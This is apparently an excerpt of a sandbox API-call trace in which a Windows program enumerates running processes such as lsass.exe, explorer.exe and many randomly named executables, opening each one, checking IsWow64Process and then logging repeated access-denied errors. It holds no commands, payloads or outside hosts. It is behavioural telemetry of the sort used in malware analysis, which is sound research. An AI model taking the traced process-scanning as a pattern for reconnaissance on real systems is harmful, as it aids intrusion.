	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.172] CloseHandle (hObject=0x224) returned 1
	[0074.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.173] CloseHandle (hObject=0x224) returned 1
	[0074.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.173] CloseHandle (hObject=0x224) returned 1
	[0074.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.174] CloseHandle (hObject=0x224) returned 1
	[0074.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.175] CloseHandle (hObject=0x224) returned 1
	[0074.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.175] CloseHandle (hObject=0x224) returned 1
	[0074.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.175] CloseHandle (hObject=0x224) returned 1
	[0074.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.175] CloseHandle (hObject=0x224) returned 1
	[0074.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.176] CloseHandle (hObject=0x224) returned 1
	[0074.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.176] CloseHandle (hObject=0x224) returned 1
	[0074.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.176] CloseHandle (hObject=0x224) returned 1
	[0074.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.177] CloseHandle (hObject=0x224) returned 1
	[0074.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.177] CloseHandle (hObject=0x224) returned 1
	[0074.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.177] CloseHandle (hObject=0x224) returned 1
	[0074.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.177] CloseHandle (hObject=0x224) returned 1
	[0074.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb30, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.177] CloseHandle (hObject=0x224) returned 1
	[0074.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.178] CloseHandle (hObject=0x224) returned 1
	[0074.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.178] CloseHandle (hObject=0x224) returned 1
	[0074.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.178] CloseHandle (hObject=0x224) returned 1
	[0074.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728838, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.178] CloseHandle (hObject=0x224) returned 1
	[0074.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.178] CloseHandle (hObject=0x224) returned 1
	[0074.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.179] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.179] CloseHandle (hObject=0x224) returned 1
	[0074.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.179] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.179] CloseHandle (hObject=0x224) returned 1
	[0074.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.179] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.179] CloseHandle (hObject=0x224) returned 1
	[0074.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.179] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.179] CloseHandle (hObject=0x224) returned 1
	[0074.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.179] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.179] CloseHandle (hObject=0x224) returned 1
	[0074.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728818, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.180] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.180] CloseHandle (hObject=0x224) returned 1
	[0074.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.180] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.180] CloseHandle (hObject=0x224) returned 1
	[0074.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.180] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.180] CloseHandle (hObject=0x224) returned 1
	[0074.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e810, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.180] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.180] CloseHandle (hObject=0x224) returned 1
	[0074.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.180] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.180] CloseHandle (hObject=0x224) returned 1
	[0074.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.181] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
